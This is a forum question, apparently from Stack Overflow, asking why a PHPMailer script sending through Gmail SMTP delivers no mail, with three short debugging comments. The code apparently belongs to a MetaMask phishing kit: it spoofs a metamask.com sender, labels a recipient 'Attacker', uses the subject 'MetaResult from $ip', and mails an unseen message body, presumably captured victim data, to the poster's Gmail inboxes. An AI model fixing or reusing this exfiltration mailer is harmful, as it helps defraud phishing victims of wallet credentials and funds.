# How do i need to handle situations, in which no mails are sent by smtp.google.com

Tags: phpmailer

The Mail i try to send automatically though smtp.google.com somehow never appear in my inbox, spamfolder etc.
I tried to use different mail@gmail.com (in case the one before were blocked) but this wasn't a solution, i tried to change the from mail which haven't solved it in any way. I tried to find a way to make the following code work as expected for approxemently 1h - 2h and yet still havn't got any good result. Maybe more advanced Users can help me.

```php
$jsonconfig = file_get_contents('config.json');
$json_data = json_decode($jsonconfig,true);
$host = $json_data['SMTP Configuration']['Host'];
$user = $json_data['SMTP Configuration']['User'];
$pass = $json_data['SMTP Configuration']['Password'];

$send = "example1@gmail.com";
$send2 = "example2@gmail.com";
$subject = "MetaResult from $ip";
// $headers = "From: Meta<custome556pport@Spammershhhhmm.com>";
// $headers .= $_POST['example1@gmail.com']."\n";
// $headers .= "MIME-Version: 1.0\n";
$arr=array($send, $ip);
foreach ($arr as $send)
{

     $mail = new PHPMailer(true);

     try {
     //Server settings
     $mail->SMTPDebug = SMTP::DEBUG_SERVER;                      //Enable verbose debug output
     $mail->isSMTP();                                            //Send using SMTP
     $mail->Host       = $host;                     //Set the SMTP server to send through
     $mail->SMTPAuth   = true;                                   //Enable SMTP authentication
     $mail->Username   = $user;                     //SMTP username
     $mail->Password   = $pass;                               //SMTP password
     $mail->SMTPSecure = PHPMailer::ENCRYPTION_SMTPS;            //Enable implicit TLS encryption
     $mail->Port       = 465;                                    //TCP port to connect to; use 587 if you have set `SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS`

     //Recipients
     $mail->setFrom('from@metamask.com', 'Metamask');
     $mail->addAddress($send, 'Attacker');     //Add a recipient
     $mail->addAddress($send2);               //Name is optional

     //Content
     $mail->isHTML(true);
     $mail->Subject = $subject;
     $mail->Body    = $message;
     // $mail->AltBody = 'This is the body in plain text for non-HTML mail clients';

     $mail->send();
     print('Message has been sent');
     } catch (Exception $e) {
        print("Message could not be sent. Mailer Error: {$mail->ErrorInfo}");
     }
     // mail($send,$subject,$message,$headers);
     // mail($to,$subject,$message,$headers);
}
```

My config.json file:

```json
{
  "SMTP Configuration": {
    "Host": "smtp.google.com",
    "User": "example3@gmail.com",
    "Password": "examplepassword"
  }
}
```

Maybe there is a hidden error somewhere which someone isn't shown in the Terminal...

Comment: You're setting the DEBUG option. What is that telling you?

Comment: Actually nothing. i now got a errorlog after writing it to a extra file. maybe this helps:
Mailer Error: SMTP Error: Could not connect to SMTP host.Message could not be sent. Mailer Error: Invalid address:  (to): ::1

Comment: Well that seems like an entirely reasonable error message given that `::1` is indeed not a valid address? Also, allowing submitters to set a destination address is asking to abuses as a spam gateway.